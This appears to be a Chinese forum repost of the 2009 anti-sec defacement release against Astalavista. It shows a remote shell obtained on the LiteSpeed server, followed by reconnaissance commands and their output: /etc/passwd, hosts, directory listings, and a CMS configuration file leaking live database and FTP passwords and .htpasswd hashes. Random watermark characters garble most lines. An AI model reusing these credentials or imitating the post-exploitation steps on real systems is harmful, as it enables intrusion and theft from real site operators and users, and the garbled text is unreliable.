里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
8 b8 n# S2 _) h9 h0 E. E8 F9 C4 @0 o( n, C, s8 P# [* j5 n \
[root@front3 ~]# curl -I litespeedtech.com
& f; r/ a" V# l- n) y" N! r; LHTTP/1.1 200 OK
& E) |" V6 s) YDate: Fri, 05 Jun 2009 22:54:51 GMT
8 c0 v- v8 D3 A9 q7 V* aServer: LiteSpeed* Y+ ?+ v1 `. w
: P! b; U4 n' a9 Z6 S0 A3 O2 T$ X另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-% `; d1 x) ~3 `
[+ B& s: u Q0 J有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
" \. L' ?+ Y+ E0 @$ z& Z/ d# O/ O8 B' o9 l+ @' S
" [5 i7 |2 Q) \& W
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
" p& m% o1 s; A6 P' i' Z/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
8 V1 i6 k% n! J P" n7 i: K7 w/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \! @; v8 \+ N2 p. ]! f
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /* ^& V+ e e! U
\/ \/ \/ \/ \/ \/ \/
5 Y ~* m% \$ T% K The Hacking & Security Community6 j5 O3 ]3 z' I
[+] Founded in 1997 by a hacker computer enthusiast8 W2 h1 D4 n' R
[-] Exposed in 2009 by anti-sec group
3 n7 }6 s8 _2 d
' v. L! O' w7 A) A; nFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:. N$ u k/ j- }4 r/ k# `: Z
>> 03. Who’s behind the site?
) d o4 S% m6 B% `$ S>>4 i# f5 B/ X8 X
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
9 N% c! ?9 l; ]$ T7 g1 Z) K" A" z1 c* ]+ G
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?2 c# W# l. y" ]
>>
! A g9 a; T6 N/ i, a>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
. u; i6 s, \& J9 V$ O3 u. u& a1 u% w2 w7 ]military institutions.& v7 y: S) Q! J& P! h- D; A' q+ o
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
4 `) q0 |, J- a7 r; h% Y0 K# l/ v9 m# V: F& K6 n- }
Why has Astalavista been targeted?
6 B! L6 Y! e/ Z" D# {
) Y* G6 A8 x& p2 p# mOther than the fact that they are not doing any of this for the “community” but, N. N$ C9 j5 t8 {6 n: I" X
for the money, they spread exploits for kids, claim to be a security community+ y9 n0 h+ M8 F/ T
(with no real sense of security on their own servers), and they charge you $6.66# Y2 q3 O8 i4 r2 F1 S
per months to access a dead forum with a directory filled with public releases
1 z- y' y% Y) O# E _7 T) }and outdated / broken services.
9 Z% J/ [" O" T, L% X U- q* F& S/ P+ V8 }/ x* l% O- n
We wanted to see how good that “team of security and IT professionals” really is.
) a7 I) j; J2 V9 g$ Y2 r: L% O
7 b" p. T1 ?2 c) z9 vLet’s begin./ ~+ r5 J: U; [' O" Z0 A
7 C- Y+ T2 E" s' g4 Ranti-sec:~# ./g0tshell astalavista.com -p 80
+ F4 h; W9 o4 E% B4 {6 Y, ^[+] Connecting to astalavista.com:80
8 @0 d$ Z7 @- i! M; w; b [4 l[+] Grabbing banner…0 F' J; @ T M6 o
LiteSpeed
; i7 \7 B# j' P[+] Injecting shellcode…
6 P' v0 D/ d0 k[-] Wait for it
( ]0 p% @) b4 X8 A$ }2 v8 x1 R+ ^3 ^* z' |
[~] We g0tshell6 r7 w4 h: Q1 W% ?3 Z F
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
3 N' L/ F0 x( {, i; O: h& mID: uid=100(apache) gid=500(apache) groups=500(apache)" B1 P+ t2 r h2 }
$ [0 [/ {( {( h. r
sh-3.2$ cat /etc/passwd7 _. H8 K( F: h) M1 i/ J6 Q T8 B
root:x:0:0:root:/root:/bin/bash# K2 d6 f& G1 r! Q/ n* T- D D/ L
bin:x:1:1:bin:/bin:/sbin/nologin
. K+ p# Y3 \- H9 _. {' Vdaemon:x:2:2:daemon:/sbin:/sbin/nologin
. t9 Z5 Q% ^& r. o: n$ h0 g/ O9 Tadm:x:3:4:adm:/var/adm:/sbin/nologin6 T% q$ \5 Z6 [/ j6 g% Y+ T
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin4 ?" X! \6 ]1 g& t/ \8 S, d
sync:x:5:0:sync:/sbin:/bin/sync
6 c- y' \) l3 o+ W; w1 E. Oshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
N) o, l1 B I# bhalt:x:7:0:halt:/sbin:/sbin/halt, Q$ z' U% O) t
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
6 u+ g/ D# W n. l+ n9 @news:x:9:13:news:/etc/news:! k" J; Z1 G" n+ \5 l+ r
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
5 O ^' W$ B3 W7 Z$ toperator:x:11:0 perator:/root:/sbin/nologin8 d7 E6 |. Z3 A8 |
games:x:12:100:games:/usr/games:/sbin/nologin# h x( D& o4 T4 P; D6 c8 D0 n) R
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin! |) u0 F2 r# U1 M* y$ R) K
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" `9 J% C. U& K! \8 N4 S; [
nobody:x:99:99:Nobody:/:/sbin/nologin( [1 X+ M9 G$ o% c
rpm:x:37:37::/var/lib/rpm:/sbin/nologin F2 b7 D+ M ]0 B* N2 B
dbus:x:81:81:System message bus:/:/sbin/nologin
0 `/ }8 u$ J3 y/ t8 C4 \, ?( Gnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
7 C+ m! J3 U& W$ ^0 zmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin: L4 @2 }9 W! I `: Y
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
6 h0 v2 g$ T0 T: hvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin& z$ p u! g( l4 h
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
7 X( m3 R+ y& o, q( w e! yrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
4 P& L+ N& P# grpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
' ]- m' A; ^5 @( `6 Infsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
6 O; w( F* l+ d8 hsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin) D! R$ T% r7 j! J. }, [6 O
pcap:x:77:77::/var/arpwatch:/sbin/nologin% x! O t6 y- a' ^" `- ?% y
named:x:25:25:Named:/var/named:/sbin/nologin" w6 U. T( Y/ C. j5 {
apache:x:100:500::/var/www:/bin/false
* y7 G) V/ ]/ K/ h( D) q z' Ldiradmin:x:101:101::/usr/local/directadmin:/bin/bash& r3 k9 L& Y {5 v. |
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash- }8 ]0 s% }; `0 L4 w ^
webapps:x:500:501::/var/www/html:/bin/bash9 r& @ }+ l0 [, y \ ~
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
1 ^7 b/ H( i) a' e3 aadmin:x:501:502::/home/admin:/bin/bash0 b# i$ `# ^+ b* `7 N
jon:x:502:503::/home/jon:/bin/bash k/ N5 F {, E, r1 J) x( g9 c6 |
com:x:503:504::/home/com:/bin/bash
2 C% q2 z; Q/ U* Mntp:x:38:38::/etc/ntp:/sbin/nologin
% `: H# {* E8 ~$ `$ hais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin, E0 |' }6 ?0 Q
astanet:x:504:505::/home/astanet:/bin/bash- T* f2 b N: X7 W# m
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
$ T4 g5 O' q: S$ w. ]avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
3 ?& C5 m' Q s# ]
4 R) e) O7 _- t; G& m/ w) H( Nsh-3.2$ cat /etc/hosts, Q3 E4 P8 I9 g1 L# h2 _' D3 X
# Do not remove the following line, or various programs) C4 E' F' E* P9 ?1 \7 F) C
# that require network functionality will fail.% F/ h7 [0 K8 b2 ^) |$ l$ Z7 \: n
127.0.0.1 localhost.localdomain localhost% ], p( k2 N3 m, J' ^
::1 localhost6.localdomain6 localhost6
8 Q5 E, Q: D( `7 B( r$ W9 U3 a" I80.74.154.172 asta1.astalavistaserver.com4 P- z5 }' w8 ~! h4 G! t
! b( `/ ~# y, s3 X/ k; a* o) _# X# U! `sh-3.2$ pwd
' }5 \, b+ v( W# X, Q5 j6 p/home/com/public_html
' n8 A2 z/ Z% L8 l% Q. K' N, w6 s
, M; L6 |* K! ~ bsh-3.2$ ls -la
, @/ l, k* k4 T- d9 dtotal 184609 e6 {% V( n$ S3 x5 z
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
0 w4 c/ a; @2 |5 J. ~ U2 W, l2 Idrwx–x–x 11 com com 4096 Jun 25 2008 ..
3 J& Y3 s( l0 l, n; P& P4 Hdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
* k* O+ y" A$ W; e, Z- ~2 f1 n3 }drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache" s- d' O# E. O* ^9 Z) |
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin8 b. Z1 m( S/ ?( L1 f" g" B0 e
drwxrwxrwx 2 com com 4096 May 19 00:50 config& b# {# B& r. K# N! K' V$ J
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core6 J* `- U4 o6 q( ~& M' M9 |
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
3 {% b* X& ?: J, v, bdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
c# j Z) R) q# c# ~. ~0 d/ Idrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo! ]& h% H8 M3 w. H
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
3 ?& U8 i+ g. z/ r6 f0 ]( b-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php- q: ]9 U. ^: @2 i
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd2 c. y% F$ ~% J
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
/ n% _7 b- J" ]6 X, c) V9 P-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
7 k& Y) u5 y' ]drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed+ `6 F2 @9 a; P$ Q
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
, [ n) a! q. S-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
# S1 V+ U* R" O1 D' A-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak% d: }( R q6 V9 ^
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
2 X* X5 k( h' l5 Wdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
0 \- G% K" ?" H" i! |-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
8 E" A& Z# h1 k2 ~, W% d9 m& Gdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer# o1 P, {" a6 G6 L5 a- y
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
( ^& o) Q, o1 w E* [: odrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
- I. b* A8 h2 x0 G8 Z' d7 M2 bdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media) ?4 s r5 ]' I+ s- J
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
3 h/ k; e, @$ J6 E; U; ddrwxr-xr-x 34 com com 4096 May 28 16:30 modules
3 A8 U: V7 D4 \6 ]/ vdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin3 |9 c$ q0 I4 x8 g* R2 Y! E
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
5 q0 G& D: S* O5 T% mdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old* k) `" M. c0 M ]: ^, N+ [
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy/ p+ `; H: n# O# s( i1 Q- \
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
7 ~) Q+ h7 I! a- H0 U1 a-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
5 D2 j, O, ], w) l: Q-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml9 t+ |3 W- F6 R9 f! _
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
9 d. c! p% X. X! N/ M3 i& u7 Cdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes6 y2 X5 q% h4 L S b
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp) W0 E9 N( X m! w
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
! T* \8 ~9 W7 N: j8 w: _1 l( U' |+ k# l( ^4 D' C4 E0 @% D
sh-3.2$ head -20 index.php+ n- \( Q; {1 o2 f( R
<?php! j. `' m- _' k0 _0 E4 y
) E! b$ N' h. X" Q: p6 g/**
- M, N2 f6 q3 z) d1 [, e1 ?* The main page for the CMS
# F% z, }' M' H& x7 l& F8 M$ R" Y* @copyright CONTREXX CMS - COMVATION AG$ n1 p9 h$ m* x2 z& h6 K
* @author Comvation Development Team* g1 D; d3 {8 |1 }( h
* @version v1.0.9.10.1 stable
1 K- `$ D A8 X* @package contrexx5 q. `. B) Y1 V, |7 Z
* @subpackage core7 y) ?6 L" P* P. G/ _" S
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage0 L/ V( e' N% J5 m4 N+ ?
* @since v0.0.0.0: [ |5 W i" X1 } d% s) y: S3 H
* @todo Capitalize all class names in project2 I! n( l- v C" }3 }
* @uses /config/configuration.php
2 G8 d3 q9 ^: P; d/ w( ?5 F* @uses /config/settings.php% g+ w9 G! q: Y1 ^% x5 k
* @uses /config/version.php8 @/ @- K$ ?. t& B: S
* @uses /core/API.php" E u4 R& W- n8 c
* @uses /core_modules/cache/index.class.php5 C& O% Y5 x. K& U* m
* @uses /core/error.class.php2 \4 l& Z9 a+ y- _/ G# p
* @uses /core_modules/banner/index.class.php
0 h" ^0 V% q& R0 V* @uses /core_modules/contact/index.class.php( ?6 Z' q1 x8 T) s" F
" |6 u% e1 w/ e' F3 F7 v! z* F4 rsh-3.2$ cd config/% k8 q% d3 h& X/ @
sh-3.2$ ls -la
1 i e1 X! _2 Xtotal 329 Y; Q1 J1 [0 `
drwxrwxrwx 2 com com 4096 May 19 00:50 .9 P; i/ Y! R' U6 S. X
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- d9 U, Y6 [4 s. X, F. C( {-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
$ Z% B" S+ h3 G, Z) n8 A3 L-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php3 O$ e& B) [- x7 X
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php3 ]3 y) Q5 h+ U3 I
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php3 P/ f0 R O5 t( B: a& c/ O' j7 e
4 x& s* C& p8 ^% esh-3.2$ cat configuration.php
' }5 C/ {% i0 x[snip]: Q5 X# {' Y7 @1 }5 s6 u
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost( j% ]; e: p* h: _" O5 {* r
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
, K" m8 f9 D2 k0 y- B ]! z' F' m/ U" y$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix4 ?6 L. w( m5 ?5 Q" v
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
$ |) w2 z8 Z! |; R$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password7 i+ m+ a4 L& H& i" l x7 e2 A& r
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)7 _& {6 m" I+ G. h
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
0 N' I& ^ P k9 d* }" b[snip]
. `+ z6 x; H) R) n$_FTPCONFIG['is_activated'] = true; // Ftp support true or false( V( S; X( R; t0 z/ \+ }
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode8 o5 w2 I- L" o$ c! f
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
0 S5 N$ U$ c' a) u9 k$_FTPCONFIG['port'] = 21; // Ftp remote port
# s) F; L9 E4 u( w1 z6 M$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username' I, ?. ^8 R9 `# v* l& {
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
2 o3 H f9 z7 ?6 j) W( @2 K4 u$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
( R0 A8 Y% E! ~2 A6 W& I- G$ e' |8 j( `4 b4 w
sh-3.2$ cd ..& Y- b, [* z* T0 U
sh-3.2$ cd dvd/
0 F! u! k! Y& C/ M7 x) [sh-3.2$ ls -la
1 F6 M, U% q3 A0 |, m2 Rtotal 2913780- _" j- g% R5 W( c+ ?
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
Y* t1 E, u3 q9 i5 f6 r6 Fdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..; S$ O1 ?* K: ^3 g
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
& C4 }) h; i7 u. ~7 v1 t8 s; ^-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
" N' e! Q/ H& o. C-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar# o* Q0 t% u$ y3 t' S/ R
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
- J ]1 }% o, [% g" t7 u" p3 ^# v5 a8 m" V$ ?1 @
sh-3.2$ cat .htaccess
( i3 f% i4 r+ o) @. vauthType Basic
1 _7 m4 j" @0 CauthName DVD1 m5 l3 U( E8 H3 O- X& }
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
: G8 T) ~0 K/ y2 k5 s* nrequire valid-user
3 D% D/ a8 L K$ `: X" l2 Z" r/ `) \) ~( a l9 K
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd) A' i* x3 J6 i7 y4 t% O2 i
DVDdownload:CRD8cuY6.MPT62 g" ]! y. Y1 [8 k* H
DVDdownload2:CR8a36.wluFMg
4 Y) [" `; X+ b: _8 B0 q/ n+ h5 t9 m5 _4 v* ?) b/ ]; d$ ~
sh-3.2$ cat test.php
- K: W+ z- K/ A+ e L<?php
$ I) Q$ R1 q3 [; _$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;+ ~! c5 U- `& K7 f3 l: a" h- @
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
+ \+ u9 ^' q- |: {! Q5 r, J( ]! lecho $url;* N& f- }8 O9 r) c% j* V( g
?>
5 a6 B& M& j; y2 u: w6 H; v+ k Z* [
* F# o2 u% F" Osh-3.2$ cd modifications/# _- \' P. H5 }/ c
sh-3.2$ ls -la8 r+ i7 R5 b( Y7 `2 ^' U
total 32) ~; s8 n3 p7 N% R! @* t/ o9 A
drwxr-xr-x 8 com com 4096 May 11 12:48 .
+ H/ f9 P A7 bdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' v' e3 A" _5 xdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
4 C+ n; G5 N# ?: o1 ^, p" Pdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs* Y( Y$ u' f S& p/ R
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
8 t" y% [9 J2 cdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc; e. U" h- N$ Z( i1 w0 e9 S
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
0 ~+ K# ^5 z2 g4 {, P+ Cdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp: x% n: q3 t8 Q u9 X
5 @% ` x) O8 `2 }- x: ^sh-3.2$ ls -R
# w5 x ?0 s; P.:' Q5 w3 p" o( D% A
com_avtng cronjobs onlinetools pjirc search _tmp7 z2 p) g4 m. W% h% z; m- r! ~
/ t' U# E' f( S0 c: b2 m8 H./com_avtng:
8 U2 |( }8 A" C8 I7 g5 ?avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
$ Q [1 [$ S4 @% k3 |: C/ ]7 _- M4 v. @
./com_avtng/scripts: w9 E- G* A0 d, t6 j$ y! H
popunder.js8 a H, m2 l; }* y0 L9 V$ \
9 k4 R# T' @0 G: R+ g1 t5 S
./cronjobs:
$ V; x# _ h9 E9 Z+ F$ Xexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp& J% c" ` O* K# f1 ?
. l8 q* a# ?# ]4 p% }; S./cronjobs/tmp:3 H; j/ ?* S* s' \/ W
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv, m7 i4 M' y- S" K* e
0 l3 F9 ?$ ?- C' s+ h, T
./onlinetools:
' W) @! [6 z3 E, b0 Eindex.php
% c0 _; ]& |- v- G. Q5 P; m( u3 Z: j3 d' z, Z2 |7 e! F
./pjirc:: j4 }5 K6 I( ^( M' e( x( [1 Z
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
5 J# L- B' S4 X, R/ xAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
$ d+ H2 _4 V" v# ]1 e8 l9 [background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
2 T7 u. k1 i# A( E
; @- v) n5 h6 |# g$ X7 z3 ]./pjirc/img:
) b/ X1 q+ m: |2 l) b0 j* nange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
$ Z0 K8 O+ b! s/ D2 I# {6 larbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
5 j7 Q. a) ?" `3 qverre-eau.gif5 H6 A9 B. T: H
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
) m# t% i9 f: } Q, sverre-vin.gif. P) B( a7 p5 U8 |* P- b
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif; Z) C% ^! |: l) r' M4 |1 x. B
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif! t0 b& D3 b0 Y" ^" c4 J6 O
; X5 ~1 C1 S, w. W2 l./pjirc/snd:& V4 `) b3 p8 j' b0 T
bell2.au ding.au; G$ _% `* F" r5 e5 y r& q
. k4 K; N9 i: A/ I) [
./search:
% {2 z+ q( s* ] J1 csearchEngines.php search.php
4 a3 }* y p5 ]
, y4 z9 _( F/ q./_tmp:; m" \0 B& r! L2 X/ I$ [
defaultPorts.php defaultPorts.txt8 |9 l% p' x' q
& p v F. ?' T* _/ ~ Ish-3.2$ cd cronjobs/! o" ?8 E) ~% b$ x, j3 {. Q3 V
sh-3.2$ cat exploits.php6 w3 k3 q6 ]7 @) d0 K- i/ Z: U
[snip]* U) m$ _- ]& `4 R6 e# h
$categories = array();3 o( _/ N3 N# C
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
7 `% l; G( Q( i! |' G$expolits = file($milw0rmFile);+ T& \( w5 t3 x' `$ N+ b
$comExploits = array();7 N# Q2 P5 M/ k3 o6 K7 k
[snip]# o& G) L/ P" y. E) i. Z
// manage data$ S% _- Y' E5 B$ y# c/ o
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
C8 x+ X( {! D
7 J% J* O1 C9 G1 J% n* |( T // get path and title% O. q G! w5 k8 q1 \
$expolits[$x] = trim($expolits[$x]);) ~+ O& Y0 @0 e$ l O- g' m( P
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
2 d: L2 a4 K( z' V# I $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);2 y, `3 E, H/ a, f8 S. w
% n: y4 i4 N; }+ Q // check if file exists/ d r, c- T+ F2 V* I
if (file_exists($path)) {% P& h1 k, [% O- R
7 @! [+ D9 L) u& [6 G
$text = file_get_contents($path);
+ F. P% Q8 _. }3 J/ ^: f1 p* N( w1 d8 J5 T3 L
// get content and date
1 |$ j. l- o% H) m, A( W0 \ I //$text = htmlspecialchars($text, ENT_QUOTES);1 `7 G# G! Y. v( S$ b, i+ D, x, {
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
}; {$ _6 ]: `2 p if ($tmptext != ”) {( p3 w2 ^- v* H; @( i
$text = $tmptext;
. p% L/ @! Q. l" y7 O } else {7 F% w/ S3 W+ Q5 F& s7 \, k& ]
$text = addslashes(htmlentities($text, ENT_QUOTES));$ t# `& P! Z* N/ |" M7 H
}
4 K& ~* C5 J& }* Z7 L $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));. E# c& E {+ l+ P1 P3 j) [
$tmp = explode('-', $date);
0 l( g- {* q4 U7 ]- R' l $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
& ^" F& g5 |0 e S6 { $cat = getCategory ($path);; C$ i% ^+ \% ?! n0 I) g; L
$ext = pathinfo(basename($path));
: i1 N3 ^4 V: s1 W/ x! v $ext = $ext['extension'];. N6 x5 e: l/ [; s7 e* r1 h
$qStr = ”5 Q0 b0 D9 R7 h6 P" Y* S
SELECT `id`
) J4 @8 \* h8 k# I5 b FROM `contrexx_module_exploits` U# @. z% }# y+ R& Y
WHERE `title` = ‘” . $title . “‘; t; N( v" k; K: W0 f" Z+ g8 S
AND `date` = ‘” . $date . “‘
2 [8 k, B* B2 X: P8 G0 U “;
! F, Q" t; A, }4 q; ? echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
( v& ?5 S% S+ g& }0 e7 \3 ^8 ^ $q = $_objDB->query($qStr);
3 m f% M9 z, g
+ o. S! Z/ v0 w: R4 Z if ($q->numRows() == 0) {. b% ]" b3 B& I) b2 |9 K( P
3 S) l. T0 m+ e1 e- f% }' ~
// prepare array4 q/ x. ?0 E7 X9 n9 F0 d2 R& B
$comExploits[$x]['date'] = $date;
3 I+ A& g/ {! Z+ e& o1 |7 E7 c $comExploits[$x]['title'] = $title;% P2 }& V' {2 N c. Q( X
$comExploits[$x]['author'] = ‘milw0rm’;- V" m+ l; S5 E3 l
$comExploits[$x]['text'] = $text;, q, Y, { M F4 b3 W5 a t5 c) A! [
$comExploits[$x]['source'] = $ext;
2 e/ i7 x0 s4 u6 M3 i! t m $comExploits[$x]['url1'] = ”;
: U! T! C% ^6 i/ h ~3 K3 w $comExploits[$x]['url2'] = ”;
8 w' S* k- l/ N7 i+ c; h p $comExploits[$x]['catid'] = $cat;" k" Y/ ]1 B! ?4 k1 `# [( j: R& Z
$comExploits[$x]['lang'] = ‘2′;. g! x5 B8 k1 u* e
$comExploits[$x]['userid'] = ‘12′;
9 q# u# h7 x/ \$ F" g: D" N $comExploits[$x]['startdate'] = ‘0000-00-00′;/ t2 M1 V" f' ~
$comExploits[$x]['enddate'] = ‘0000-00-00′;
L/ r) A8 b+ W: m6 y5 y/ ` $comExploits[$x]['status'] = ‘1′;
+ G+ H9 |2 G1 G( L, y4 h $comExploits[$x]['changelog'] = $date;
, R3 {: e" B+ b! ?# Z, P( F
+ D& Q* y2 s V }
2 X! B. t+ R2 @7 i8 s' |$ G[snip]; g* l# ^: V- o3 S3 `3 J
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
1 y' |, d5 r _<rss version=”2.0″>
. n) {! I! O/ \! d% ?' L8 n <channel>. c0 ?! J t: N: R. J% V, }' s
<title>ASTALAVISTA.com - Exploits</title>
" z; U! u5 X w4 n. N, M <link>http://www.astalavista.com/exploits</link>! j8 p! [% \/ f1 o
<description>All availably Exploits.</description>
